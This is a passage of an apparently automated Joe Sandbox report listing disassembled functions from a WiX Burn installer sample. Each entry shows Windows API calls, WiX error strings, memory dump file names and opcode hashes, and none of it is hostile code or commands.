                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D221B4B2A00326BBEF355ED48C4AF9A7B68EF46754F114124BA0066290D7B58E60E693
                                                                                                                                                                                                                                                                            Function 0094672F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,0000001C,?,?,008FF5CE,WiX\Burn,PackageCache,00000000,0000001C), ref: 009467D9
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 00946760, 009467BA
                                                                                                                                                                                                                                                                            • Failed to open policy key: %ls, name: %ls, xrefs: 009467AE
                                                                                                                                                                                                                                                                            • Failed to open policy key: %ls, xrefs: 00946754
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to open policy key: %ls$Failed to open policy key: %ls, name: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-3938230626
                                                                                                                                                                                                                                                                            • Opcode ID: 508122225c960204bd6eb1d7c1d76e19451efd5b6c1b7ab78f11f3b447c1df2c
                                                                                                                                                                                                                                                                            • Instruction ID: 10fb8cdc35a40dc2c1dbb9522b10cef17e214c77a362ec20e6d0ac63a3ddb02f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 508122225c960204bd6eb1d7c1d76e19451efd5b6c1b7ab78f11f3b447c1df2c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E521F4B2940325FBDF325ED4CC4AFAE7A68EF42728F114524FA0076191D3B58D60E693
                                                                                                                                                                                                                                                                            Function 009037DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77processCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,008E7659,?,?,00000001,00000000,00000000), ref: 00903844
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,008E7659,?,?,00000001,00000000,00000000), ref: 0090384A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateErrorLastProcess
                                                                                                                                                                                                                                                                            • String ID: CreateProcessW failed with return code: %d$d:\a\wix4\wix4\src\burn\engine\core.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2919029540-2527134587
                                                                                                                                                                                                                                                                            • Opcode ID: 81990e15374c4620c43b33df4409304ce53bcee12514cf8a35f2fba045e3626c
                                                                                                                                                                                                                                                                            • Instruction ID: 74dba28affc3beddad18cf9a7905f660c74c2ccf0148f7bd5584b28ae3c96104
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81990e15374c4620c43b33df4409304ce53bcee12514cf8a35f2fba045e3626c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9211E1BA9002697BDB219E568C4AE9F7E7DEFC5B54F058019FE04A7280E2709911C7B0
                                                                                                                                                                                                                                                                            Function 0090DFF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0090EB41: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,0090E01F,?,?,?), ref: 0090EB69
                                                                                                                                                                                                                                                                              • Part of subcall function 0090EB41: GetLastError.KERNEL32(?,0090E01F,?,?,?), ref: 0090EB73
                                                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 0090E02D
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0090E037
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLast$PointerRead
                                                                                                                                                                                                                                                                            • String ID: Failed to read during cabinet extraction.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2170121939-336985225
                                                                                                                                                                                                                                                                            • Opcode ID: 7b53af900c56383180bf7caa9ea20039cff96496d063538b5da240569ca7a32b
                                                                                                                                                                                                                                                                            • Instruction ID: 4af195fa31916dddc8d71d05cac3541a756c736e573001a198140b111cfccf9c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b53af900c56383180bf7caa9ea20039cff96496d063538b5da240569ca7a32b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8311A376A4126ABBCB209F65DC49E8B7B6CFF04BA4F014514BE14E7291D270D910D6D0
                                                                                                                                                                                                                                                                            Function 00943F70 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,00000000,00000000,008FCE5F,00000000,00000000,00000000,?,?,?,00942BE6,?,?,?), ref: 00943F95
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00942BE6,?,?,?), ref: 00943F9F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                            • String ID: Failed to write data to file handle.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 442123175-1082378667
                                                                                                                                                                                                                                                                            • Opcode ID: a75708143f7939748795fe1c973898f052da8fd05ba44116814de78d2e3bd53d
                                                                                                                                                                                                                                                                            • Instruction ID: 227c408e9c2ae0900e89e6befa8c5c01a698e1605e97a1333bbb43cb6a681471
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a75708143f7939748795fe1c973898f052da8fd05ba44116814de78d2e3bd53d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5501B573E40228BBE7119EA8CC86FAFB67CEB55B54F118059F904E7140E670DE0496E0
                                                                                                                                                                                                                                                                            Function 009439DD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,008FCE21,?,00000000,00000000,00000000,00000000), ref: 009439F5
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,008FCE21,?,00000000,00000000,00000000,00000000), ref: 009439FF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                            • String ID: Failed to set file pointer.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2976181284-4026511950
                                                                                                                                                                                                                                                                            • Opcode ID: 4041a0df48c5fd533198252841088abe44e50055fba1a40afd94adcca87d8a8f
                                                                                                                                                                                                                                                                            • Instruction ID: 238f54ba0b31afb8530a6662f83b817849f2bc341a86b1d70aa83ea05f1f60a1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4041a0df48c5fd533198252841088abe44e50055fba1a40afd94adcca87d8a8f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D01B576640129BBDB218F55DC49EAF7BACEF45754F018019FD48EB251E370CE10D6A0
                                                                                                                                                                                                                                                                            Function 0090EB41 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,0090E01F,?,?,?), ref: 0090EB69
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0090E01F,?,?,?), ref: 0090EB73
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                            • String ID: Failed to move to virtual file pointer.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2976181284-2079782632
                                                                                                                                                                                                                                                                            • Opcode ID: 9ba65dd0b57712556ec043a28de67e345dfda8043d007a87a7767da809b00746
                                                                                                                                                                                                                                                                            • Instruction ID: c8c68c80fd81ec6ac0aa7c85ceedfddf692f9b7629889cec61674aa14bfc650f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ba65dd0b57712556ec043a28de67e345dfda8043d007a87a7767da809b00746
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6401F53750063A7BD721475A8C08EABBF6CEF417B0F018526FE18A7290D675DC20DAD0
                                                                                                                                                                                                                                                                            Function 008F9FD1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000000,00000000,00000002,00000002,?,008FA612,00000008,?), ref: 008FA072
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Logging, xrefs: 008F9FFF
                                                                                                                                                                                                                                                                            • SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 008F9FE8
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-387823766
                                                                                                                                                                                                                                                                            • Opcode ID: f32209167ad21df0829b0f695aa152c4534c6b49c781324a64141164d14192a9
                                                                                                                                                                                                                                                                            • Instruction ID: 3811ee6591e494f0d1016e1723b708107f061b1ad24d5038f8f9db26070837ef
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f32209167ad21df0829b0f695aa152c4534c6b49c781324a64141164d14192a9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E1126B6540A0DEBEB38DA30E906FBA7768FB85B25F900054EE09E7180DA759E41C752
                                                                                                                                                                                                                                                                            Function 0093CBC2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(?,0093CBBE,00000000,00000000,00000003,00000000,?,?,00946603,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 0093CBED
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 0093CC1C, 0093CC22, 0093CC39
                                                                                                                                                                                                                                                                            • Failed to open registry key, root: %x, subkey: %ls., xrefs: 0093CC2E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Open
                                                                                                                                                                                                                                                                            • String ID: Failed to open registry key, root: %x, subkey: %ls.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 71445658-2584571730
                                                                                                                                                                                                                                                                            • Opcode ID: 67fa8913ef28b86db4d45610161c9909cea39be8de59b356cf0923c9be4ddffb
                                                                                                                                                                                                                                                                            • Instruction ID: f384915dce032a8dc81de022a0edaf00f7a565cb2eacf174e1184b5acfdce396
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67fa8913ef28b86db4d45610161c9909cea39be8de59b356cf0923c9be4ddffb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 540126B710095876EB211A178C09E9B3A5EEBC5360F054820FA1CAB250D6318C51DBB4
                                                                                                                                                                                                                                                                            Function 008E7BE6 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008E80F4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E7B31
                                                                                                                                                                                                                                                                            • Failed to initialize Cryputil., xrefs: 008E7BE6
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Uninitialize
                                                                                                                                                                                                                                                                            • String ID: Failed to initialize Cryputil.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3861434553-397782128
                                                                                                                                                                                                                                                                            • Opcode ID: 8937a9508f248c67a4b99f1c359a59461db5107f724a26f39f80031398011154
                                                                                                                                                                                                                                                                            • Instruction ID: 43658158c3de9c33007f71123789817e9cd300cd71778d4686de3878dc6f8e78
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8937a9508f248c67a4b99f1c359a59461db5107f724a26f39f80031398011154
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA4161719056A9D6DF34B7A5CC06BAD72B8FF42305F1840A6A558E2182DF748EC8CF92
                                                                                                                                                                                                                                                                            Function 008E7B61 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008E80F4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E7B31
                                                                                                                                                                                                                                                                            • Failed to initialize engine state., xrefs: 008E7B61
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Uninitialize
                                                                                                                                                                                                                                                                            • String ID: Failed to initialize engine state.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3861434553-3105230827
                                                                                                                                                                                                                                                                            • Opcode ID: 9c51e8ff955aa5931fd937d5eaf475b42006c2ab92e2eaf3fbc254fac760ac34
                                                                                                                                                                                                                                                                            • Instruction ID: cdd56e3715cfc043c1afcceb71d54b0ca5f20ca38399fce633cb805643440d8c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c51e8ff955aa5931fd937d5eaf475b42006c2ab92e2eaf3fbc254fac760ac34
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 754162719056A9D6DF34B7A5CC06BAD72B8FF42305F1840A5A558E2182DF748EC8CF92
                                                                                                                                                                                                                                                                            Function 008E7C13 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008E80F4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E7B31
                                                                                                                                                                                                                                                                            • Failed to initialize Regutil., xrefs: 008E7C13
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Uninitialize
                                                                                                                                                                                                                                                                            • String ID: Failed to initialize Regutil.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3861434553-4164290783
                                                                                                                                                                                                                                                                            • Opcode ID: f699e4061cdb9b73391d62aecdfd5d01716e5aeadd4c127d82c559054db8d8dc
                                                                                                                                                                                                                                                                            • Instruction ID: 0efdf077ca90321ae215a780d7315187c10758ba5f00cb3c520aeb32862abb2b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f699e4061cdb9b73391d62aecdfd5d01716e5aeadd4c127d82c559054db8d8dc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF4171319056A9D6DF34B7A5CC06BAD72B8FF42305F1840A6A558E2082DF748EC8CF92
                                                                                                                                                                                                                                                                            Function 008E7B1F Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 114COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008E80F4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E7B31
                                                                                                                                                                                                                                                                            • Failed to parse command line., xrefs: 008E7B1F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
